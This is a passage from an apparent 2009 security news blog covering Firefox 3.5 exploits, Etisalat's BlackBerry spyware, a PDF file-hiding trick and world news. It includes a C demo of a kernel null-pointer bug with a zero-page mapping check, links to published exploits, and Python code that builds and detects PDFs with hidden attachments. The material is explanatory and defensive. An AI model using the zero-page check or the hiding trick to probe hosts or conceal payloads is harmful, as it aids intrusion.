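    if (tun == NULL)            /* ... check second: may be removed  */
        return -1;
    return flags;
}

/* Hardened form: the check precedes every dereference, so there is no
 * earlier access for the optimiser to reason from. */
int poll_safe(const struct tun_struct *tun)
{
    if (tun == NULL)
        return -1;
    return tun->flags;
}

/* Host check for the second half of the attack: can this process map
 * the zero page?  The vm.mmap_min_addr sysctl is what normally forbids
 * it for unprivileged users.  Returns 1 if the mapping succeeded. */
int can_map_zero_page(void)
{
    size_t len = 4096;
    void *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if (p == MAP_FAILED)
        return 0;
    munmap(p, len);
    return 1;
}

int main(void)
{
    struct tun_struct t = { .flags = 0x40 };
    printf("poll_safe(&t)      = %d\n", poll_safe(&t));
    printf("poll_safe(NULL)    = %d\n", poll_safe(NULL));
    printf("zero page mappable = %s\n", can_map_zero_page() ? "yes" : "no");
    return 0;
}
```

Compile with `gcc -O2 -S` and look for the comparison against zero in poll_unsafe: it is normally gone, while `gcc -O2 -fno-delete-null-pointer-checks` keeps it, which is the flag the kernel build adopted after this bug. The mapping check reports whether mmap_min_addr is actually blocking page zero on the host you run it on; a "yes" from an unprivileged shell means the userland half of this exploit technique is open.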

Firefox 3.5.1 Released

http://www.mozilla.com/en-US/firefox/3.5.1/releasenotes/

Firefox 3.5.1 fixes the following issues:

  • Several security issues.
  • Several stability issues.
  • An issue that was making Firefox take a long time to load on some Windows systems.

Please see the complete list of changes in this version. You may also be interested in the Firefox 3.5 release notes for a list of changes in the previous version.

Deadly Blasts Hit Two Luxury Hotels in Jakarta, Indonesia

Via CNN -

The death toll from bombings at two luxury hotels Friday morning in south Jakarta, Indonesia, has risen to eight, a presidential spokesman said. The number of wounded people was in the 40s, the spokesman said.

Antara News, a state-run agency, quoted a witness as saying he saw four foreigners among the wounded.

The Ritz-Carlton Hotel was to have accommodated soccer players from Manchester United of Britain, who are expected to arrive in Jakarta on Saturday.

The victims were taken to nearby MMC Hospital and Jakarta Hospital, the agency reported.

Police sealed off the area around both blasts, one of which occurred in the Ritz-Carlton Hotel and the other at the J.W. Marriott Hotel, about 50 meters away, about 7:50 a.m. (8:50 p.m. Thursday ET).

"There was a boom and the building shook, and then subsequently two more," said hotel guest Don Hammer, who was leaving his room in the Marriott when the blast occurred.

"The shocking part was entering the lobby, where the glass at the front of the hotel was all blown out and blood was spattered across the floor, but most people were leaving calmly."

[...]

Greg Woolstencroft had just walked past the hotels and had gone to his nearby apartment when he heard an explosion.

"I looked out my window and I saw a huge cloud of brownish smoke go up," he told CNN in a telephone interview. "I grabbed my iPhone to go downstairs ... and then the second bomb went off at the Ritz-Carlton, so I then ran around to the Ritz-Carlton and I was able to find that there had been a massive bomb that went off in this ... restaurant area and the explosion had blown out both sides of the hotel.

"I found inside the body of what appears to be a suicide bomber, it looked like someone who had been a suicide bomber or someone who had been very, very close to the explosion.
"I also noticed that there were a number of injured people being taken off to hospital, but I only noticed one dead person at this point and time, that's all I saw. There has been extensive damage to both buildings, and at this point and time of course all the authorities are blocking up all the area and starting an investigation."

He added, "It's obviously targeted establishments where there are Westerners and expats ... I can only assume it's something to try and send a message."

---------------------------------

According to Stratfor....

Militant group Jemaah Islamiyah (JI) is a feasible perpetrator for the attacks.

Thursday, July 16, 2009

Investigation Into Cyberattacks Stretches Around the Globe

Via PC World -

British authorities have launched an investigation into the recent cyberattacks that crippled Web sites in the U.S. and South Korea, as the trail to find the perpetrators stretches around the world.

On Tuesday, the Vietnamese security vendor Bach Khoa Internetwork Security (Bkis) said it had identified a master command-and-control server used to coordinate the denial-of-service attacks, which took down major U.S. and South Korean government Web sites.

A command-and-control server is used to distribute instructions to zombie PCs, which form a botnet that can be used to bombard Web sites with traffic, rendering the sites useless. The server was on an IP (Internet Protocol) address used by Global Digital Broadcast, an IP TV technology company based in Brighton, England, according to Bkis.

That master server distributed instructions to eight other command-and-control servers used in the attacks. Bkis, which managed to gain control of two of the eight servers, said that 166,908 hacked computers in 74 countries were used in the attacks and were programmed to get new instructions every three minutes.

But the master server isn't in the U.K.; it's in Miami, according to Tim Wray, one of the owners of Digital Global Broadcast, who spoke to IDG News Service on Tuesday evening, London time.

The server belongs to Digital Latin America (DLA), which is one of Digital Global Broadcast's partners. DLA encodes Latin American programming for distribution over IP TV-compatible devices, such as set-top boxes.

New programs are taken from satellite and encoded into the proper format, then sent over VPN (Virtual Private Network) to the U.K., where Digital Global Broadcast distributes the content, Wray said. The VPN connection made it appear the master server belonged to Digital Global Broadcast when it actually is in DLA's Miami data center.

Engineers from Digital Global Broadcast quickly discounted that the attacks originated with the North Korean government, which South Korean authorities have suggested may be responsible.

Digital Global Broadcast was notified of a problem by its hosting provider, C4L, Wray said. His company has also been contacted by the U.K.'s Serious Organized Crime Agency (SOCA). A SOCA official said she could not confirm or deny an investigation. DLA officials could not be immediately reached.

Investigators will need to seize that master server for forensic analysis. It's often a race against the hackers, since if the server is still under their control, critical data could be erased that would help an investigation.

"It's a tedious process and you want to do it as quickly as possible," said Jose Nazario, manager of security research for Arbor Networks.

Data such as log files, audit trails and uploaded files will be sought by investigators, Nazario said. "The holy grail you are looking for are pieces of forensics that reveal where the attacker connected from and when," he said.

To conduct the attacks, the hackers modified a relatively old piece of malware called MyDoom, which first appeared in January 2004. MyDoom has e-mail worm characteristics and can also download other malware to a PC and be programmed to conduct denial-of-service attacks against Web sites.

Analysis of the MyDoom variant used in the attacks isn't that impressive. "I still think the code is pretty sloppy, which I hope means they [the hackers] leave a good evidence trail," Nazario said.

Firefox 3.5.1 Due Later This Week

Via MozillaLinks.org -

Mozilla has confirmed that it will release the first update for Firefox 3.5 later this week to address a critical security vulnerability disclosed a couple of days ago that could lead to malicious code execution.

The update will most likely also address a bug related to slow startups due to large Windows temporary folders being scanned for Firefox’s randomness needs. However, some testers report the fix already available in a release candidate doesn’t improve the startup time, so it seems there are other possible causes and the fix may not help all users.

A second update (3.5.2) is already in the works and is expected for late July. This will address some bugs originally targeted for 3.5.1 that got postponed to speed Firefox 3.5.1 update.

Symbian Phone Trojan 'has Botnet Features'

Via ZDNet -

A piece of mobile malware has the capacity to enable a hacker to build a botnet of phones, according to security vendor Trend Micro.

The Symbian Trojan, which Trend Micro detects as SYMBOS_YXES.B, poses as a legitimate application called ACSServer.exe and calls itself 'Sexy Space'. It steals the user's subscriber, phone and network information, and connects to a website to send that information back to a hacker. It can also target the victim's contacts with spam SMS messages, and pull the content in those messages from the malicious website.

"In short, it appears to be a botnet for mobile phones," wrote Jonathan Leopando of the Trend Micro technical communications team in a blog post on Wednesday.

However, the malware itself is classified as low risk, with a low distribution potential, according to a Trend Micro analysis.

Leopando added that there may be a problem with digital signing by the Symbian Foundation. Digital signatures, which are cryptographic security features, are designed to provide a level of certainty that a message or piece of software actually comes from the organisation it appears to have come from.

However, Leopando wrote in the blog post that SYMBOS_YXES.B was similar to another phone malware that Trend Micro detects as SYMBOS_YXES.A, and that both pieces of malware had been signed by Symbian Foundation.

"The signing process — undertaken by the Symbian Foundation itself — is supposed to ferret out instances like this, but somehow this slipped through," wrote Leopando. "It may well be a coincidence, but it does not reinforce confidence in the signing system."

The Symbian Foundation had not responded to a request for comment at the time of writing.

Nmap 5.00 Released

http://nmap.org/5/

Insecure.Org is pleased to announce the immediate, free availability of the Nmap Security Scanner version 5.00 from http://nmap.org/. This is the first stable release since 4.76 (last September), and the first major release since the 4.50 release in 2007. Dozens of development releases led up to this.

Considering all the changes, we consider this the most important Nmap release since 1997, and we recommend that all current users upgrade.

--------------------

Ed Skoudis has written up his first impressions of this huge release.

XKCD: Sheeple

http://xkcd.com/610/

Taliban Threatens to Kill U.S. Soldier Captured in Afghanistan

Via FoxNews (AP) -

A spokesman for a Taliban commander says a captured U.S. soldier will be executed unless the U.S. military stops operations in two districts of southeastern Afghanistan.

The Taliban said last week they were holding the soldier. The U.S. military earlier said he went missing and may be in enemy hands.

Abdullah Jalali, spokesman for Taliban commander Mawlavi Sangin, told The Associated Press on Thursday the soldier was healthy but threatened to kill him unless the U.S. stops airstrikes in Ghazni province's Giro district and Paktika province's Khoshamand district.

Jalali says Giro has been heavily bombed by international forces but did not otherwise explain why they chose those areas.

Teen Arrested for Upper East Side Starbucks Blast

Via NBCNewYork.com -

A teen arrested in the bombing of an upper East Side Starbucks was inspired to plant the explosive device by the movie "Fight Club," cops said today.

Kyle Shaw, 17, of Chelsea, was charged with arson, criminal mischief and criminal possession of a weapon for placing the bomb at the E. 92nd St. coffee shop, police said.

Shaw was inspired to plant the bomb at the Manhattan eatery by watching the anarchic behavior of Brad Pitt in the film "Fight Club." He picked the site because a Starbucks was a target in the movie, police said.

Shaw formed his own fight club in which boys beat one another in various locales around the city including Central Park, Police Commissioner Ray Kelly said.

At least one member got a broken nose, he said.

Shaw apparently told at least one friend to "watch the news over Memorial Day'' because he was about to launch his own version of "project mayhem,'' Kelly said. Investigators are looking into whether more people might have been involved.

The homemade device exploded at 3:30 a.m. on May 25 and no one was hurt in the attack. The bomb was made out of a water bottle and powder used to make fireworks.

Video at the scene showed two teens carrying a plastic container with what cops believed to be explosives.

--------------------------

For more background information, check my May 25th blog entry on the blast...

Pay As You Drive “Black Boxes” Threaten Driver Privacy

Via EFF -

The California Department of Insurance (DOI) is considering regulations that would enable insurance prices to depend on the precise number of miles a car is driven in a given billing period. But in implementing these "Pay As You Drive" regulations, the DOI appears poised to empower insurance companies to require customers' cars to be outfitted with "black-box" devices that could transmit back to the insurance companies all sorts of data about car motion (acceleration, braking, and so forth) as well as driver behavior (steering and seat-belt wearing).

Although DOI has retreated from its prior position that these devices should track your location – a definite improvement – it's still true that every car already has a reliable, tamper-resistant device that verifies actual mileage: an odometer.

Even worse, there appear to be no restrictions on what the insurance companies would do with that data — of course, when you drive on the public street, you lose some privacy. But 10 years ago, someone interested in your whereabouts would have had to decide in advance to follow you and then physically follow you. Black boxes can collect information pervasively, silently, and cheaply for any later use by the insurance company, private parties or the government. There is real danger that this information would not only be used to ascertain the political or associational affiliations of drivers, but also to charge more if you drive and park in neighborhoods with high vehicle theft and crime rates, to impose higher premiums for people who drive at night or to link your health insurance rates with location data that reveals your lunchtime trips to McDonald's.

In comments filed with the DOI this week, EFF has argued that it is unacceptable for insurance companies to coercively require customers to accept such devices in their cars, and that the proposed regulations be amended to permit drivers to participate in any verified actual mileage program via other means (like your car's odometer). EFF also argued that location privacy requires, at a minimum, that the proposed regulations restrict collection of information to the minimum amount necessary, require that the driver be able to independently verify information collected and require that the insurer have an explicit policy about the use and storage of the collected data.

Interested in protecting driver privacy in California? Consider telling Insurance Commissioner Steve Poizner [contact info] that you agree with EFF's criticisms. Why is the Insurance Commissioner allowing the insurance companies to track drivers? Shouldn't he be tracking insurance companies?

Wednesday, July 15, 2009

CERN LHC Update

Via US LHC Blog -

This message was sent from Director General Rolf Heuer to the CERN community today:

The foreseen shutdown work on the LHC is proceeding well, including the powering tests with the new quench protection system. However, during the past week vacuum leaks have been found in two “cold” sectors of the LHC. The leaks were found in sectors 8-1 and 2-3 while they were being prepared for the electrical tests on the copper stabilizers at around 80 K. In both cases the leak is at one end of the sector, where the electrical feedbox, DFBA, joins Q7, the final magnet in the sector.

Unfortunately, the repair necessitates a partial warm-up of both sectors. This involves the end sub-sector being warmed to room temperature, while the adjacent sub-sector “floats” in temperature and the remainder of the sector is kept at 80 K. As the leak is from the helium circuit to the insulating vacuum, the repair work will have no impact on the vacuum in the beam pipe. However the intervention will have an impact on the schedule for the restart. It is now foreseen that the LHC will be closed up and ready for beam injection by mid-November.

---------------------------

Liquid nitrogen is used to cool 37,000 tonnes of equipment for the Large Hadron Collider (LHC) down to 80 K. Then liquid helium is used to chill some parts of the accelerator to temperatures as low as 1.8 K.

But liquid helium isn't created directly....

The cryoplants produce high-pressure supercritical helium gas at 4.6 K, which will be distributed along the sector to a number of local cooling loops. There, the supercritical helium will be expanded into a lower-pressure environment, which causes it to liquefy at either 4.5 K or 1.8 K. This liquid will then be used to cool the superconducting magnets.

Firefox 3.5 Exploits - Another Exploit Released

The one you have been hearing about (here & here):
http://www.milw0rm.com/exploits/9137

and a new one released today:
http://www.milw0rm.com/exploits/9158

Veracode: BlackBerry Spyware Dissected

Via Veracode Blog -

Yesterday it was reported by various media outlets that a recent BlackBerry software update from Etisalat (a UAE-based carrier) contained spyware that would intercept emails and text messages and send copies to a central Etisalat server. We decided to take a look to find out more.

We’re not sure why the software was delivered in both .jar and .cod form. The .cod file is a RIM proprietary format that contains the compiled Java classes along with a signature. Therefore it’s not even necessary to send the .jar, but they did, completely unobfuscated.

[...]

The most alarming part about this whole situation is that people only noticed the malware because it was draining their batteries. The server receiving the initial registration packets (i.e. “Here I am, software is installed!”) got overloaded. Devices kept trying to connect every five seconds to empty the outbound message queue, thereby causing a battery drain. Some people were reporting on official BlackBerry forums that their batteries were being depleted from full charge in as little as half an hour.

The final thing to mention is that the spyware does appear to be installed in a non-running state by default, where it’s not actually exfiltrating data once the initial registration packet has gone out. However, using the command and control mechanism we described earlier, the carrier can remotely start/stop the service at will on a per-device basis.

-------------------------

Check out the full Veracode blog for the detailed technical analysis...cool stuff indeed.

New iTunes From Apple Halts Palm Pre's Access

Via WSJ.com -

The latest version of iTunes from Apple Inc. (AAPL) has cut off rival Palm Inc.'s (PALM) Pre smartphone.

Apple's online music and video bazaar now "disables devices falsely pretending to be iPods," which includes Palm's Pre, an Apple spokesman said.

The Pre smartphone has been able to access iTunes since going on sale in the U.S. in early June. But it was always unclear whether the Pre was doing so with Apple's permission. Given the latest iTunes update, Palm appears to have been acting on its own.

The development is a negative one for Palm, which is counting on Pre sales to turn around the company. With the move, Apple has dramatically limited one of the Pre's key competitive advantages: downloading music and videos from Apple's iTunes.

"If Apple chooses to disable media sync in iTunes, it will be a direct blow to their users who will be deprived of a seamless synchronization experience," Palm spokesman Lynn Fox said,

"However, people will have options," which include using previous versions of iTunes that are still Pre-compatible, she added.

For Apple, the new iTunes underscores its commitment to allow only authorized devices, such as its iPods and iPhones, to access its iTunes music store, which helps it corral more of the profits.

"As we've said before, newer versions of Apple's iTunes software may no longer provide syncing functionality with unsupported digital media players," the Apple spokesman added.

---------------------

If you didn't hear about the Palm Pre Media Sync function and how it gained access to iTunes, check here.

Critical JavaScript Vulnerability in Firefox 3.5

http://blog.mozilla.com/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/

Issue

A bug discovered last week in Firefox 3.5’s Just-in-time (JIT) JavaScript compiler was disclosed publicly yesterday. It is a critical vulnerability that can be used to execute malicious code.

Impact

The vulnerability can be exploited by an attacker who tricks a victim into viewing a malicious Web page containing the exploit code. The vulnerability can be mitigated by disabling the JIT in the JavaScript engine. To do so:

1. Enter about:config in the browser’s location bar.
2. Type jit in the Filter box at the top of the config editor.
3. Double-click the line containing javascript.options.jit.content setting the value to false.

Note that disabling the JIT will result in decreased JavaScript performance and is only recommended as a temporary security measure. Once users have received the security update containing the fix for this issue, they should restore the JIT setting to true by:

1. Enter about:config in the browser’s location bar.
2. Type jit in the Filter box at the top of the config editor.
3. Double-click the line containing javascript.options.jit.content setting the value to true.

Alternatively, users can disable the JIT by running Firefox in Safe Mode. Windows users can do so by selecting Mozilla Firefox (Safe Mode) from the Mozilla Firefox folder.

Status

Mozilla developers are working on a fix for this issue and a Firefox security update will be sent out as soon as the fix is completed and tested.

Credit

Zbyte reported this issue to Mozilla and Lucas Kruijswijk helped reduce the exploit test case.

-----------------------------------

HD Moore has released an MSF module that exploits the vulnerability on Win32 only; support for other platforms is expected in the near future.

Etisalat's BlackBerry Patch Opens Phones to Surveillance

Via ITP.net -

The battery-sapping "performance patch" that Etisalat [Emirates Telecommunications Corporation] sent to its BlackBerry subscribers over the last few days was designed to give the UAE operator the ability to read its customers emails and text messages, a Qatar-based software expert told CommsMEA yesterday.

Last week, Etisalat told its 100,000 BlackBerry subscribers that a "performance enhancement patch" would be sent to them to "provide the best BlackBerry service and ultimate experience". But users who downloaded the software complained of dramatically reduced battery life and slower than usual performance of their devices.

Nigel Gourlay, a Doha-based Sun-certified Java programmer who has been developing open source software for 15 years, analysed the patch after it was posted on BlackBerry’s community support forum and he said that once installed, it potentially gives Etisalat the power to view all emails and text messages sent from the BlackBerry.

“I don’t think it’s been designed for a large scale deployment,” he said. “They have released it as an upgrade across all UAE BlackBerry handsets, all of which have tried to phone home to this one registration server at the same time, and that has effectively brought the server to its knees. When the BlackBerry cannot register itself, it tries again and this causes the battery drain.”

Gourlay pointed out that by default the system is turned off and when it installs the only message that is sent is an initial registration message, and that later on, Etisalat could turn on the systems “one by one”.

Once installed, one of the possible commands that can be sent to the device is "start", which would then cause any subsequent message to be forwarded to an Etisalat website.

Gourlay said the patch was stamped with “SS8.com”, the name of a US-based software developer that describes itself as an electronic surveillance solutions company that develops products that “allow intelligence agencies to recognise, monitor, investigate and prevent criminal activity”.

It appears as though the use of such software is widespread among telecom operators, and according to SS8’s website, its products are used by “some of the largest service providers in the world”.

On Sunday Etisalat issued a two paragraph statement apologising for “a phased software upgrade…that led to extra consumption of the handset battery”. It described the patch as a “routine upgrade process”, but said it had stopped issuing it as a precautionary measure.

At the time of writing the operator had not responded to requests sent yesterday (Monday) for further details about the precise purpose of the patch or Etisalat’s relationship with “lawful interception solutions” firm SS8.

SS8 established its presence in the UAE in February this year when it acquired OCI Mobile, a technology provider that specialised in providing surveillance solutions to government organisations.

Cisco 2009 Midyear Security Report

The Cisco 2009 Midyear Security Report presents an overview of Cisco security intelligence, highlighting threat information and trends from the first half of 2009. The report also includes recommendations from Cisco security experts and predictions of how identified trends will evolve.

As predicted in the Cisco 2008 Annual Security Report, attacks are only becoming more sophisticated and targeted as we move through 2009—and the global recession. However, while cybercrime is more pervasive, there are encouraging signs that increased collaboration among the "good guys" is not only making it more difficult for attacks to take root and grow, but also helping to bring criminals to justice.

Report Highlights

  • Criminals are exploiting "old-school" vulnerabilities because they believe security experts and individual computer users are paying little attention to these types of threats.
  • Compromising legitimate websites for the purpose of propagating malware remains a highly effective technique for criminals.
  • Web 2.0 applications, prized for their ease of use and flexibility, have become lures for criminals.
  • Criminals are targeting people who use online banking with well-designed, localized text message scams—and they're leaving virtually no trail.
  • The Obama administration has made strengthening U.S. cybersecurity a high priority, and looks to leverage technology innovation and partner with the private sector. Other countries are also stepping up efforts to enhance cybersecurity and prevent cybercrime.
In addition, the number of vulnerabilities and discrete threats has been off to a slower start this year compared to 2008, according to research by Cisco, a sign the security community is succeeding in making it more difficult for attacks to take root and grow.

The Cisco 2009 Midyear Security Report (PDF) is now available.

Embedding and Hiding Files in PDF Documents

Via Didier Stevens' Blog -

My corrupted PDF quip inspired me to program another steganography trick: embed a file in a PDF document and corrupt the reference, thereby effectively making the embedded file invisible to the PDF reader.

The PDF specification provides ways to embed files in PDF documents. I’m releasing my Python program to create a PDF file with embedded file (I used make-pdf-embedded.py to create my EICAR.pdf).

[...]

Of course, once you know the stego trick, it’s easy to recover the embedded file: edit the PDF document with a hex editor and change the case back to /EmbeddedFiles.

But if you want to make it harder to detect, use PDF obfuscation techniques. Or embed the file twice with incremental updates. First version is the file you want to hide, second version is a decoy…

The PDF language offers so many features to hide and obfuscate data!

Download: make-pdf_V0_1_2.zip (https)

MD5: 305D57692C27DD3CD91D8C85A3932948

SHA256: A030BBCB8B54137D8047A4CB5C350725599383A4B113CABBA8871AC221378C5B
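The trick above is invisible only to the reader's attachment pane, not to anyone reading the raw bytes. As an added detection-side example (my own code, not Didier Stevens' make-pdf-embedded.py), the block below builds a small PDF with one embedded file, optionally with the /EmbeddedFiles key mis-cased as the post describes, then scans the raw bytes for /EmbeddedFile stream objects whether or not the name tree references them. The object layout and the payload are constructed for the example; all function names are my own.

```python
"""Detection-side check for the /EmbeddedFiles case trick (added example).

Scans raw PDF bytes for /Type /EmbeddedFile stream objects and records how the
catalog's /Names dictionary spells the /EmbeddedFiles key. A reader only lists
attachments reached through a correctly cased key, so a stream present in the
file without one is an attachment the reader will never show.
"""
import re


def build_sample_pdf(payload: bytes, hide: bool = False) -> bytes:
    """Construct a minimal one-page PDF carrying one embedded file.

    Constructed sample for the scanner below. With hide=True the name-tree key
    is written as /EmbeddedFILES, the broken reference described in the post.
    """
    key = b"/EmbeddedFILES" if hide else b"/EmbeddedFiles"
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /Names << " + key + b" 5 0 R >> >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        (b"<< /Type /EmbeddedFile /Length %d >>\nstream\n" % len(payload)
         + payload + b"\nendstream"),
        b"<< /Names [(hidden.txt) 6 0 R] >>",
        b"<< /Type /Filespec /F (hidden.txt) /EF << /F 4 0 R >> >>",
    ]
    out = b"%PDF-1.4\n"
    offsets = []
    for num, body in enumerate(objs, 1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objs) + 1, xref_pos))
    return out


# Dictionary of an embedded-file stream; \b stops it matching /EmbeddedFiles.
EMBEDDED_STREAM = re.compile(rb"/Type\s*/EmbeddedFile\b")
# Any spelling of the name-tree key, so a case trick is surfaced rather than missed.
NAME_TREE_KEY = re.compile(rb"/(EmbeddedFiles)\b", re.IGNORECASE)
STREAM_BODY = re.compile(
    rb"/Type\s*/EmbeddedFile\b[^>]*>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def scan_pdf(data: bytes) -> dict:
    """Count embedded-file streams and report whether a reader would list them."""
    streams = len(EMBEDDED_STREAM.findall(data))
    keys = sorted({m.group(1).decode() for m in NAME_TREE_KEY.finditer(data)})
    return {
        "embedded_streams": streams,
        "name_tree_keys": keys,
        # streams present but no correctly cased key: invisible to the reader
        "hidden": streams > 0 and "EmbeddedFiles" not in keys,
    }


def extract_embedded(data: bytes) -> list:
    """Return the raw bytes of every embedded-file stream, referenced or not."""
    return [m.group(1) for m in STREAM_BODY.finditer(data)]


if __name__ == "__main__":
    for hide in (False, True):
        pdf = build_sample_pdf(b"constructed payload", hide=hide)
        print("hidden" if hide else "normal", scan_pdf(pdf), extract_embedded(pdf))
```

The scanner deliberately ignores the name tree when counting streams, so the "embed twice with incremental updates" variant shows up as two /EmbeddedFile streams against one decoy entry. It only sees dictionaries stored in clear text: a file that wraps its objects in a compressed object stream (PDF 1.5) or applies /FlateDecode to the embedded stream needs decompressing before this kind of byte-level search says anything.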

China Stops Clinic Treating Internet Addiction With Electroshock

Via WSJ's China Journal Blog -

Chinese authorities have put to a stop one clinic’s extreme effort to wean youngsters away from the Internet — a practice that highlights the skepticism surrounding China’s approach to Internet addiction, as well as the existence of the condition itself.

The Ministry of Health ordered that the clinic in Shandong province stop using electroshock as a form of punishment, according to Chinese media. Electroshock therapy was administered as a punishment for violating any number of the center’s rules. But the government said the treatment hasn’t been proven safe, while outsiders questioned whether the practice was effective in getting young people away from their compulsion to spend significant time online.

In what might be an indication of the clinic’s effectiveness, its practices came to light when former patients went online to complain. They described restrictive living conditions — including being allowed to talk only about their addiction and being forced to kneel in front of their parents in obedience — that scarcely squared with the clinic’s way out, which for them merely meant declaring they had overcome their addiction.

China claims the world’s largest online population, and a visit to an Internet cafe in most mainland cities would show what a major share of young people like to do with their free time. That’s given rise to fears that many in China suffer from Internet addiction. While not officially recognized as a malady by China’s medical establishment, the issue has drawn concerns from both the public and some officials, which have sanctioned treatment facilities and issued guidelines on how to deal with Internet addiction.

But a sizable chunk of China’s online population is skeptical of the claims. Their doubts are reflected within the professional community, where the concept of Internet addiction has gained traction but still faces doubters who point to a lack of hard data.

Tuesday, July 14, 2009

Russia Tests 2nd Sub-launched Ballistic Missile

Via CBSNews.com (AP) -

News agencies say Russia has successfully tested its second submarine-launched ballistic missile in as many days.

RIA-Novosti and Interfax quote the head of Russia's joint chief of staff as saying a Sineva-type missile was fired Tuesday from the submarine Bryansk near the White Sea.

Gen. Nikolai Makarov was quoted as saying it was a short-range test for the Sineva.

Russia is struggling to introduce the newer, more-sophisticated Bulava missile into service, but it has failed in five of 10 launches.

Russian leaders say the Bulava will be able to penetrate missile defenses and will be a key part of the military's future nuclear arsenal.

----------------------

According to RIA-Novosti (July 14th, 2009),

The RSM-54 Sineva (NATO codename SS-N-23 Skiff) is a third-generation liquid-propellant intercontinental ballistic missile that entered service with the Russian Navy in July 2007. It can carry four to 10 nuclear warheads, depending on the modification. Russia is planning to equip its Delta IV class submarines with at least 100 Sineva missiles.

Navy commander Adm. Vladimir Vysotsky recently said Russia would carry out the next test of a Bulava sea-launched ballistic missile in late July, one of a total of four or five launches this year.

Offensive-Security WPA Rainbow Tables

http://www.offensive-security.com/wpa-tables/

Cowpatty WPA tables, SSID Specific, using a 49 Million WPA optimised password dictionary file

Each Table is 1.9 GB. Please help by seeding these files

Pepper Spray-Armed ATM Misfires, Shoots Workers

Via Wired.com -

A South African bank has outfitted its ATMs with pepper spray to prevent criminals from bombing or tampering with the machines. But the system still has some bugs: One of the machines released its stinging payload on three maintenance workers last week.

Absa Bank, one of South Africa’s largest, installed the spray on 11 machines after someone bombed several of its ATMs last year, according to local news outlet Independent Online. They were installed in a region where authorities say they retrieved 40 skimmers from card machines last year.

If a camera on the machine detects someone tampering with the card slot in an attempt to install a skimming device or explosives, a mechanism installed at the ATM kiosk releases a cloudspray.

The hope is that the spray will disorient the culprit long enough to allow authorities to arrive at the scene. But during routine maintenance on one of the machines, three workers were maced instead and had to be treated.

The spray was installed on machines in the Western Cape, a popular tourist area.

-------------------------

Speaking of ATMs, it looks like they found some more malware infected ATMs in Belarus.

All of the ATMs thus confirmed infected belong to banks which have contracts with Belorussian Processing Center (BPTs), which would lead one to conclude the insider had access there. This is impossible to confirm, however, as the banks are silent and BPTs denies their machines are infected at all, insisting instead that the missing funds were caused by a "technical failure," and subsequently "defective software". BPTs went so far as to tell reporters on June 5th that these technical issues had been resolved, but victims continue to report lost funds.

First Zero Day Exploit for Firefox 3.5

Via h-online.com -

The exploit portal Milw0rm has published an exploit for Firefox 3.5. The exploit demonstrates a security vulnerability by starting the Windows calculator. In testing by heise Security, the exploit crashed Firefox under Vista, but security service providers Secunia and VUPEN confirmed that attackers using prepared websites can infect PCs. The cause of the problem is a buffer overflow when processing specially prepared Font tags.

The Mozilla Foundation has been informed about the problem, but so far has not responded to queries by heise Security. An update does not currently exist. So far there are no reports of sites on the internet being first to use the hole for active infections and exploitation of Windows PCs. Since the published exploit uses PC heap spraying under JavaScript, disabling JavaScript should act as a stopgap. When the exploit was tested with Windows 7 RC1, after a short time, the browser displayed a dialogue offering to abort the script.

Taliban: Mullah Fazlullah, Swat Leadership Safe

Via The Long War Journal -

Swat Taliban leader Mullah Fazlullah and the rest of the group's most senior commanders have escaped the Pakistani government's operation, a Taliban spokesman said.

Mullah Omar, a spokesman for the Movement of the Taliban in Pakistan, denied reports from the government and the military that Mullah Fazlullah had been gravely wounded during airstrikes in his home town of Imam Dehri.

"Fazlullah is safe and the government claim is totally baseless," Omar told Pakistani journalists. He also said the Taliban leadership had gone underground "as part of their overall strategy" once the Army launched operations in Buner, Dir, and Swat, Daily Times reported.

An unconfirmed report in the BBC seemed to corroborate the government's claims that Fazlullah is near death.

"He is now stranded in Imam Dehri without any access to medical assistance and is close to death," a local Swati with purported connections to the Taliban told the BBC. He also stated that Shah Doran, Fazlullah's second-in-command, who, like his boss, is infamous for his radical sermons and death threats issued on illegal FM radio channels, had been killed. But Doran's death has not been confirmed, either.

Omar's statements were made as Fazlullah released an audiotape to the Pakistani media. Fazlullah also stated that the Taliban leadership is intact and his forces would continue to fight for the imposition of sharia, or Islamic law.

So far, the government has failed to kill or capture Fazlullah, Doran, Ibn Amin, Muslim Khan, and 17 other most senior lieutenants who have bounties on their heads for information leading to their capture.

And although the military claims that the Swat Taliban's second and third tier leaders have been wiped out, strong resistance remains in the district despite the military's declaration that the operation has been completed. The military has also said, however, that its forces will remain in Swat as the Taliban remains strong in some pockets.

While efforts to kill or capture the Swat Taliban's senior leaders falter, the government recently released Sufi Mohammed, the pro-Taliban cleric behind the Malakand Accord, who is also Fazlullah's father-in-law. The Malakand Accord amounted to an admission of the government's defeat and emboldened the Taliban to seize more territory in the northwest.

Graffiti Taxonomy: Paris, 2009…

Graffiti Taxonomy: Paris, 2009 from Evan Roth on Vimeo.

A study depicting the stylistic diversity found in Parisian graffiti tags. Now on display at Fondation Cartier’s Born In The Streets - Graffiti exhibition until November 29, 2009.

http://fffff.at/graffiti-taxonomy-paris-2009/

Two French Security Advisers Kidnapped in Somalia

Via BBC -

Two French security advisers helping the Somali government have been kidnapped in the capital Mogadishu, French officials have said.

Gunmen who were wearing police uniforms entered the hotel where the two were staying and took them away, eyewitnesses said.

The abductions took place in a government-held part of Mogadishu.

Islamist rebels are battling troops from the UN-backed interim government for control of the city.

The French foreign ministry said the two advisers were in Mogadishu on an official mission to provide help to the government.

They were seized at the Sahafi Hotel, which has often accommodated foreign journalists and Somali government ministers.

Hotel workers told BBC Somali that the two had checked in as journalists. A Somali official later told Reuters news agency they had done so for their own protection.

The kidnappings come two days after government troops forced Islamist militants from positions around the presidential palace.

Some of the 4,300 African Union peacekeepers in Mogadishu helped push back the insurgents.

The radical rebel group al-Shabab and its allies have been trying to topple the fragile interim government, led by moderate Islamist President Sheikh Sharif Sheikh Ahmed.

Monday, July 13, 2009

Al Qaida: Western Spies Multiply “Like Locusts”

